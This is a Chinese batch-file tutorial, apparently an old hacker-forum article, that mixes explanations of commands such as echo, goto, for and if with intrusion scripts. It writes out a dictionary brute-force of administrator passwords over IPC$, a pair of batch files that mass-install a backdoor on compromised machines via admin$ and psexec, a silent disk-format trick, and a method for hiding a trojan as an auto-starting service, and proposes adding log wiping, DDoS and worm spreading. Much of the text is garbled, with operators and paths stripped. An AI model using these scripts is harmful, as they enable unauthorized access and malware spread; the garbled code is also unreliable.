簡單批處理內部命令簡介

1、簡單批處理內部命令簡介 1.echo 命令打開回顯或關閉請求回顯功能，或顯示消息。如果沒有任何參數(shù)，echo 命令將顯示當前回顯設置。 語法:echo onoff message sample：echo off / echo hello world 在實際應用中我們會把這條命令和重定向符號（也稱為管道符號，一般用 ）結合來實現(xiàn)輸入一些命令到特定格式的文件中.這將在以后的例子中體現(xiàn)出來。 2. 命令 表示不顯示后面的命令，在入侵過程中（例如使用批處理來格式化敵人的硬盤）自然不能讓對方看到你使用的命令啦。sample：echo off echo now initializing the progr

2、am,please wait a minite. format x: /q/u/autoset (format 這個命令是不可以使用/y這個參數(shù)的，可喜的是微軟留了個autoset這個參數(shù)給我們，效果和/y是一樣的。) 3.goto 命令指定跳轉到標簽，找到標簽后，程序將處理從下一行開始的命令。 語法：goto label （label是參數(shù)，指定所要轉向的批處理程序中的行。） sample： if %1= goto noparms if %2= goto noparms（如果這里的if、%1、%2你不明白的話，先跳過去，后面會有詳細的解釋。） rem check parameters if

3、null show usage :noparms echo usage: monitor.bat serverip portnumber goto end 標簽的名字可以隨便起，但是最好是有意義的字母啦，字母前加個：用來表示這個字母是標簽，goto命令就是根據(jù)這個：來尋找下一步跳到到那里。最好有一些說明這樣你別人看起來才會理解你的意圖啊。 4.rem 命令 注釋命令，在c語言中相當與/*-*/,它并不會被執(zhí)行，只是起一個注釋的作用，便于別人閱讀和你自己日后修改。rem message sample：rem here is the description. 5.pause 命令 運行 pause

4、 命令時，將顯示下面的消息： press any key to continue . . . sample： echo off :begin copy a:*.* d：back echo please put a new disk into driver a pause goto begin 在這個例子中，驅動器 a 中磁盤上的所有文件均復制到d:back中。顯示的注釋提示您將另一張磁盤放入驅動器 a 時，pause 命令會使程序掛起，以便您更換磁盤，然后按任意鍵繼續(xù)處理。 6.call 命令 從一個批處理程序調用另一個批處理程序，并且不終止父批處理程序。call 命令接受用作調用目標的標簽。

5、如果在腳本或批處理文件外使用 call，它將不會在命令行起作用。語法: call drive:path filename batchparameters :label arguments 參數(shù): drive:path filename 指定要調用的批處理程序的位置和名稱。filename 參數(shù)必須具有 .bat 或 .cmd 擴展名。 7.start 命令 調用外部程序，所有的dos命令和命令行程序都可以由start命令來調用。 常用參數(shù)： min 開始時窗口最小化 separate 在分開的空間內開始 16 位 windows 程序 high 在 high 優(yōu)先級類別開始應用程序 realt

6、ime 在 realtime 優(yōu)先級類別開始應用程序 wait 啟動應用程序并等候它結束 parameters 這些為傳送到命令/程序的參數(shù) 執(zhí)行的應用程序是 32-位 gui 應用程序時，cmd.exe不等應用程序終止就返回命令提示。如果在命令腳本內執(zhí)行，該新行為則不會發(fā)生。8.choice 命令 choice 使用此命令可以讓用戶輸入一個字符，從而運行不同的命令。使用時應該加/c:參數(shù)，c:后應寫提示可輸入的字符，之間無空格。它的返回碼為1234. 如: choice /c:dme defrag,mem,end 將顯示 defrag,mem,endd,m,e? sample： sample

7、.bat的內容如下: echo off choice /c:dme defrag,mem,end if errorlevel 3 goto defrag （應先判斷數(shù)值最高的錯誤碼） if errorlevel 2 goto mem if errotlevel 1 goto end :defrag c:dosdefrag goto end :mem mem goto end :end echo good bye 此文件運行后，將顯示 defrag,mem,endd,m,e? 用戶可選擇d m e ，然后if語句將作出判斷，d表示執(zhí)行標號為defrag的程序段，m表示執(zhí)行標號為mem的程序段，e

8、表示執(zhí)行標號為end的程序段，每個程序段最后都以goto end將程序跳到end標號處，然后程序將顯示good bye，文件結束。 9.if 命令 if 表示將判斷是否符合規(guī)定的條件，從而決定執(zhí)行不同的命令。 有三種格式: 1)、if 參數(shù) = 字符串 待執(zhí)行的命令 參數(shù)如果等于指定的字符串，則條件成立，運行命令，否則運行下一句。(注意是兩個等號） 如if %1=a format a: if %1= goto noparms if %2= goto noparms 2)、if exist 文件名 待執(zhí)行的命令 如果有指定的文件，則條件成立，運行命令，否則運行下一句。如if exist conf

9、ig.sys edit config.sys 3)、if errorlevel / if not errorlevel 數(shù)字 待執(zhí)行的命令 如果返回碼等于指定的數(shù)字，則條件成立，運行命令，否則運行下一句。如if errorlevel 2 goto x2 dos程序運行時都會返回一個數(shù)字給dos，稱為錯誤碼errorlevel或稱返回碼，常見的返回碼為0、1。 10.for 命令for 命令是一個比較復雜的命令，主要用于參數(shù)在指定的范圍內循環(huán)執(zhí)行命令。 在批處理文件中使用 for 命令時，指定變量請使用 %variable for %variable%variable in (set) do c

10、ommand commandlineoptions %variable 指定一個單一字母可替換的參數(shù)。 (set) 指定一個或一組文件?？梢允褂猛ㄅ浞?command 指定對每個文件執(zhí)行的命令。 command-parameters 為特定命令指定參數(shù)或命令行開關。 在批處理文件中使用 for 命令時，指定變量請使用 %variable 而不要用 %variable。變量名稱是區(qū)分大小寫的，所以 %i 不同于 %i 如果命令擴展名被啟用，下列額外的 for 命令格式會受到支持: for /d %variable in (set) do command command-parameters 如

11、果集中包含通配符，則指定與目錄名匹配，而不與文件名匹配。 for /r drive:path %variable in (set) do command command-parameters 檢查以 drive:path 為根的目錄樹，指向每個目錄中的for 語句。如果在 /r 后沒有指定目錄，則使用當前目錄。如果集僅為一個單點(.)字符，則枚舉該目錄樹。 for /l %variable in (start,step,end) do command command-parameters 該集表示以增量形式從開始到結束的一個數(shù)字序列。 因此，(1,1,5) 將產(chǎn)生序列 1 2 3 4 5，(5

12、,-1,1) 將產(chǎn)生 序列 (5 4 3 2 1)。 for /f options %variable in (file-set) do command for /f options %variable in (string) do command for /f options %variable in (command) do command 或者，如果有 usebackq 選項: for /f options %variable in (file-set) do command for /f options %variable in (string) do command for /f o

13、ptions %variable in (command) do command filenameset 為一個或多個文件名。繼續(xù)到 filenameset 中的下一個文件之前，每份文件都已被打開、讀取并經(jīng)過處理。 處理包括讀取文件，將其分成一行行的文字，然后將每行解析成零或更多的符號。然后用已找到的符號字符串變量值調用 for 循環(huán)。以默認方式，/f 通過每個文件的每一行中分開的第一個空白符號。跳過空白行。您可通過指定可選 options 參數(shù)替代默認解析操作。這個帶引號的字符串包括一個或多個指定不同解析選項的關鍵字。這些關鍵字為: eol=c - 指一個行注釋字符的結尾(就一個) skip

14、=n - 指在文件開始時忽略的行數(shù)。 delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的默認分隔符集。 tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代的 for 本身。這會導致額外變量名稱的 格式為一個范圍。通過 nth 符號指定 m 符號字符串中的最后一個字符星號，那么額外的變量將在最后一個符號解析之分配并接受行的保留文本。 usebackq - 指定新語法已在下類情況中使用: 在作為命令執(zhí)行一個后引號的字符串并且引號字符為文字字符串命令并允許在 file-set中使用雙引號擴起文件名稱。 sample1: for /f eol=; tokens=2,3*

15、delims=, %i in (myfile.txt) do command 會分析 myfile.txt 中的每一行，忽略以分號打頭的那些行，將每行中的第二個和第三個符號傳遞給 for 程序體；用逗號和/或 空格定界符號。請注意，這個 for 程序體的語句引用 %i 來取得第二個符號，引用 %j 來取得第三個符號，引用 %k來取得第三個符號后的所有剩余符號。對于帶有空格的文件名，您需要用雙引號將文件名括起來。為了用這種方式來使用雙引號，您還需要使用 usebackq 選項，否則，雙引號會被理解成是用作定義某個要分析的字符串的。 %i 專門在 for 語句中得到說明，%j 和 %k 是通過to

16、kens= 選項專門得到說明的。您可以通過 tokens= 一行指定最多 26 個符號，只要不試圖說明一個高于字母 z 或z 的變量。請記住，for 變量是單一字母、分大小寫和全局的；同時不能有 52 個以上都在使用中。 您還可以在相鄰字符串上使用 for /f 分析邏輯；方法是，用單引號將括號之間的 filenameset 括起來。這樣，該字符串會被當作一個文件中的一個單一輸入行。 最后，您可以用 for /f 命令來分析命令的輸出。方法是，將括號之間的 filenameset 變成一個反括字符串。該字符串會被當作命令行，傳遞到一個子 cmd.exe，其輸出會被抓進內存，并被當作文件分析。因

17、此，以下例子: for /f usebackq delims= %i in (set) do echo %i 會枚舉當前環(huán)境中的環(huán)境變量名稱。 另外，for 變量參照的替換已被增強。您現(xiàn)在可以使用下列選項語法: i - 刪除任何引號()，擴充 %i %fi - 將 %i 擴充到一個完全合格的路徑名 %di - 僅將 %i 擴充到一個驅動器號 %pi - 僅將 %i 擴充到一個路徑 %ni - 僅將 %i 擴充到一個文件名 %xi - 僅將 %i 擴充到一個文件擴展名 %si - 擴充的路徑只含有短名 %ai - 將 %i 擴充到文件的文件屬性 %ti - 將 %i 擴充到文件的日期/時間 %z

18、i - 將 %i 擴充到文件的大小 %$path:i - 查找列在路徑環(huán)境變量的目錄，并將 %i 擴充到找到的第一個完全合格的名稱。如果環(huán)境變量未被定義，或者沒有找到文件，此組合鍵會擴充空字符串 可以組合修飾符來得到多重結果: %dpi - 僅將 %i 擴充到一個驅動器號和路徑 %nxi - 僅將 %i 擴充到一個文件名和擴展名 %fsi - 僅將 %i 擴充到一個帶有短名的完整路徑名 %dp$path:i - 查找列在路徑環(huán)境變量的目錄，并將 %i 擴充到找到的第一個驅動器號和路徑。 %ftzai - 將 %i 擴充到類似輸出線路的 dir 在以上例子中，%i 和 path 可用其他有效數(shù)值

19、代替。% 語法用一個有效的 for 變量名終止。選取類似 %i 的大寫變量名比較易讀，而且避免與不分大小寫的組合鍵混淆。 以上是ms的官方幫助，下面我們舉幾個例子來具體說明一下for命令在入侵中的用途。 sample2： 利用for命令來實現(xiàn)對一臺目標win2k主機的暴力密碼破解。我們用net use url=file:/ip/ipc$ipipc$/url password /u:administrator來嘗試這和目標主機進行連接，當成功時記下密碼。 最主要的命令是一條：for /f i% in (dict.txt) do net use url=file:/ip/ipc$ipipc$/ur

20、l i% /u:administrator 用i%來表示admin的密碼，在dict.txt中這個取i%的值用net use 命令來連接。然后將程序運行結果傳遞給find命令 for /f i% in (dict.txt) do net use url=file:/ip/ipc$ipipc$/url i% /u:administratorfind :命令成功完成d:ok.txt ，這樣就ko了。 sample3： 你有沒有過手里有大量肉雞等著你去種后門木馬呢？，當數(shù)量特別多的時候，原本很開心的一件事都會變得很郁悶：）。文章開頭就談到使用批處理文件，可以簡化日?；蛑貜托匀蝿?。那么如何實現(xiàn)呢？呵呵

21、，看下去你就會明白了。主要命令也只有一條：（在批處理文件中使用 for 命令時，指定變量使用 %variable） for /f tokens=1,2,3 delims= %i in (victim.txt) do start call door.bat %i %j %k tokens的用法請參見上面的sample1，在這里它表示按順序將victim.txt中的內容傳遞給door.bat中的參數(shù)%i %j %k。 而cultivate.bat無非就是用net use命令來建立ipc$連接，并copy木馬后門到victim，然后用返回碼（if errorlever =）來篩選成功種植后門的主機，

22、并echo出來，或者echo到指定的文件。 delims= 表示vivtim.txt中的內容是一空格來分隔的。我想看到這里你也一定明白這victim.txt里的內容是什么樣的了。應該根據(jù)%i %j %k表示的對象來排列，一般就是 ip password username。代碼雛形： - cut here then save as a batchfile(i call it main.bat ) - echo off if %1= goto usage for /f tokens=1,2,3 delims= %i in (victim.txt) do start call ipchack.bat

23、 %i %j %k goto end :usage echo run this batch in dos modle.or just double-click it. :end - cut here then save as a batchfile(i call it main.bat ) - - cut here then save as a batchfile(i call it door.bat) - net use url=file:/%1/ipc$%1ipc$/url %3 /u:%2 if errorlevel 1 goto failed echo trying to establ

24、ish the ipc$ connection .ok copy windrv32.exe%1admin$system32 & if not errorlevel 1 echo ip %1 user %2 pwd %3 ko.txt psexec url=file:/%1/%1/url c:winntsystem32windrv32.exe psexec url=file:/%1/%1/url net start windrv32 & if not errorlevel 1 echo %1 backdoored ko.txt :failed echo sorry can not connect

25、ed to the victim. - cut here then save as a batchfile(i call it door.bat) - 這只是一個自動種植后門批處理的雛形，兩個批處理和后門程序（windrv32.exe）,psexec.exe需放在統(tǒng)一目錄下.批處理內容 尚可擴展,例如:加入清除日志+ddos的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究. 二.如何在批處理文件中使用參數(shù) 批處理中可以使用參數(shù)，一般從1%到 9%這九個，當有多個參數(shù)時需要用shift來移動，這種情況并不多見，我們就不考慮它了。s

26、ample1：fomat.bat echo off if %1=a format a: :format format a:/q/u/auotset echo please insert another disk to driver a. pause goto fomat 這個例子用于連續(xù)地格式化幾張軟盤，所以用的時候需在dos窗口輸入fomat.bat a，呵呵,好像有點畫蛇添足了 sample2： 當我們要建立一個ipc$連接地時候總要輸入一大串命令，弄不好就打錯了，所以我們不如把一些固定命令寫入一個批處理，把肉雞地ip password username 當著參數(shù)來賦給這個批處理，這樣就不

27、用每次都打命令了。 echo off net use url=file:/1%/ipc$1%ipc$/url 2% /u:3% 注意哦，這里password是第二個參數(shù)。 if errorlevel 1 echo connection failed 怎么樣,使用參數(shù)還是比較簡單的吧？你這么帥一定學會了.no.3 三.如何使用組合命令(compound command) 1.& usage：第一條命令 & 第二條命令 & 第三條命令. 用這種方法可以同時執(zhí)行多條命令，而不管命令是否執(zhí)行成功 sample： c:dir z: & dir c:ex4rch the system cannot fin

28、d the path specified. volume in drive c has no label. volume serial number is 0078-59fb directory of c:ex4rch 2002-05-14 23:51 . 2002-05-14 23:51 . 2002-05-14 23:51 14 sometips.gif 2.& usage：第一條命令 & 第二條命令 & 第三條命令. 用這種方法可以同時執(zhí)行多條命令，當碰到執(zhí)行出錯的命令后將不執(zhí)行后面的命令，如果一直沒有出錯則一直執(zhí)行完所有命令； sample： c:dir z: & dir c:ex4r

29、ch the system cannot find the path specified. c:dir c:ex4rch & dir z: volume in drive c has no label. volume serial number is 0078-59fb directory of c:ex4rch 2002-05-14 23:55 . 2002-05-14 23:55 . 2002-05-14 23:55 14 sometips.gif 1 file(s) 14 bytes 2 dir(s) 768,671,744 bytes free the system cannot fi

30、nd the path specified. 在做備份的時候可能會用到這種命令會比較簡單，如： dir file&:/192.168.0.1/database/backup.mdb & copy file&:/192.168.0.1/database/backup.mdb e:backup 如果遠程服務器上存在backup.mdb文件，就執(zhí)行copy命令，若不存在該文件則不執(zhí)行copy命令。這種用法可以替換if exist了.3. usage：第一條命令 第二條命令 第三條命令. 用這種方法可以同時執(zhí)行多條命令，當碰到執(zhí)行正確的命令后將不執(zhí)行后面的命令，如果沒有出現(xiàn)正確的命令則一直執(zhí)行完所有命

31、令； sample： c:ex4rchdir sometips.gif del sometips.gif volume in drive c has no label. volume serial number is 0078-59fb directory of c:ex4rch 2002-05-14 23:55 14 sometips.gif 1 file(s) 14 bytes 0 dir(s) 768,696,320 bytes free 組合命令使用的例子：sample： copy trojan.exe url=file:/%1/admin$/system32%1admin$syste

32、m32/url & if not errorlevel 1 echo ip %1 user %2 pass %3 victim.txt 四、管道命令的使用 1. 命令 usage：第一條命令 第二條命令 第三條命令. 將第一條命令的結果作為第二條命令的參數(shù)來使用，記得在unix中這種方式很常見。 sample： time /td:ip.log netstat -n -p tcpfind :3389d:ip.log start explorer 看出來了么？用于終端服務允許我們?yōu)橛脩糇远x起始的程序，來實現(xiàn)讓用戶運行下面這個bat，以獲得登錄用戶的ip。 2.、輸出重定向命令 將一條命令或某個程

33、序輸出結果的重定向到特定文件中, 與 的區(qū)別在于，會清除調原有文件中的內容后寫入指定文件，而只會追加內容到指定文件中，而不會改動其中的內容。 sample1： echo hello worldc:hello.txt (stupid example?) sample2: 時下dll木馬盛行，我們知道system32是個捉迷藏的好地方，許多木馬都削尖了腦袋往那里鉆，dll馬也不例外，針對這一點我們可以在安裝好系統(tǒng)和必要的應用程序后，對該目錄下的exe和dll文件作一個記錄： 運行cmd-轉換目錄到system32-dir *.exeexeback.txt & dir *.dlldllback.tx

34、t, 這樣所有的exe和dll文件的名稱都被分別記錄到exeback.txt和dllback.txt中, 日后如發(fā)現(xiàn)異常但用傳統(tǒng)的方法查不出問題時,則要考慮是不是系統(tǒng)中已經(jīng)潛入dll木馬了. 這時我們用同樣的命令將system32下的exe和dll文件記錄到另外的exeback1.txt和dllback1.txt中,然后運行: cmd-fc exeback.txt exeback1.txtdiff.txt & fc dllback.txt dllback1.txtdiff.txt.(用fc命令比較前后兩次的dll和exe文件,并將結果輸入到diff.txt中),這樣我們就能發(fā)現(xiàn)一些多出來的dl

35、l和exe文件,然后通過查看創(chuàng)建時間、版本、是否經(jīng)過壓縮等就能夠比較容易地判斷出是不是已經(jīng)被dll木馬光顧了。沒有是最好，如果有的話也不要直接del掉，先用regsvr32 /u trojan.dll將后門dll文件注銷掉,再把它移到回收站里，若系統(tǒng)沒有異常反映再將之徹底刪除或者提交給殺毒軟件公司。 3.& 、& & 將一個句柄的輸出寫入到另一個句柄的輸入中。 sample.reg echo hkey_local_machinesoftwaremicrosoftwindowscurrentversionrunsample.reg echo invader=ex4rchsample.reg ec

36、ho door=5c:winntsystem32door.exesample.reg echo autodos=dword:02sample.reg samlpe2: 我們現(xiàn)在在使用一些比較老的木馬時,可能會在注冊表的hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun(runonce、runservices、runexec)下生成一個鍵值用來實現(xiàn)木馬的自啟動.但是這樣很容易暴露木馬程序的路徑,從而導致木馬被查殺,相對地若是將木馬程序注冊為系統(tǒng)服務則相對安全一些.下面以配置好地irc木馬dsnx為例(名為windrv32.exe

37、) start windrv32.exe attrib +h +r windrv32.exe echo hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun patch.dll echo windsnx =- patch.dll sc.exe create windriversrv type= kernel start= auto displayname= windowsdriver binpath= c:winntsystem32windrv32.exe regedit /s patch.dll delete patch.dl

38、l rem 刪除dsnxde在注冊表中的啟動項，用sc.exe將之注冊為系統(tǒng)關鍵性服務的同時將其屬性設為隱藏和只讀，并config為自啟動 rem 這樣不是更安全. 六.精彩實例放送。 1.刪除win2k/xp系統(tǒng)默認共享的批處理 - cut here then save as .bat or .cmd file - echo preparing to delete all the default shares.when ready pres any key. pause echo off :rem check parameters if null show usage. if %1= got

39、o :usage :rem code start. echo. echo - echo. echo now deleting all the default shares. echo. net share %1$ /delete net share %2$ /delete net share %3$ /delete net share %4$ /delete net share %5$ /delete net share %6$ /delete net share %7$ /delete net share %8$ /delete net share %9$ /delete net stop

40、server net start server echo. echo all the shares have been deleteed echo. echo - echo. echo now modify the registry to change the system default properties. echo. echo now creating the registry file echo windows registry editor version 5.00 c:delshare.reg echo hkey_local_machinesystemcurrentcontrol

41、setserviceslanmanserverparameters c:delshare.reg echo autosharewks=dword:00000000 c:delshare.reg echo autoshareserver=dword:00000000 c:delshare.reg echo nowing using the registry file to chang the system default properties. regedit /s c:delshare.reg echo deleting the temprotarily files. del c:delsha

42、re.reg goto :end :usage echo. echo - echo. echo a example for batch file echo use batch file to change the sysytem share properties. echo. echo author：ex4rch echo mail:ex4rch qq:1672602 echo. echo error：not enough parameters echo. echo please enter the share disk you wanna delete echo. echo for inst

43、ance，to delete the default shares: echo delshare c d e ipc admin print echo. echo if the disklable is not as c: d: e: ，please chang it youself. echo. echo example： echo if locak disklable are c: d: e: x: y: z: ，you should chang the command into ： echo delshare c d e x y z ipc admin print echo. echo

44、* you can delete nine shares once in a useing * echo. echo - goto :eof :end echo. echo - echo. echo ok,delshare.bat has deleted all the share you assigned. echo.any questions ,feel free to mail to url=mailto:ex4rchex4rch/url. echo echo. echo - echo. :eof echo end of the batch file - cut here then sa

45、ve as .bat or .cmd file - 2.全面加固系統(tǒng)（給肉雞打補?。┑呐幚砦募?- cut here then save as .bat or .cmd file - echo windows registry editor version 5.00 patch.dll echo hkey_local_machinesystemcurrentcontrolsetserviceslanmanserverparameters patch.dll echo autoshareserver=dword:00000000 patch.dll echo autosharewks=dwor

46、d:00000000 patch.dll rem 禁止共享 echo hkey_local_machinesystemcurrentcontrolsetcontrollsa patch.dll echo restrictanonymous=dword:00000001 patch.dll rem 禁止匿名登錄 echo hkey_local_machinesystemcurrentcontrolsetservicesnetbtparameters patch.dll echo smbdeviceenabled=dword:00000000 patch.dll rem 禁止及文件訪問和打印共享 echo hkey_local_machinesystemcurrentcontrolsetservicesremoteregistry patch.dll echo start=dword:00000004 patch.dll echo hkey_local_machinesystemcurrentcontrolsetservicesschedule patch.dll echo start=dword:00000004 patch.dll echo hkey_local_mach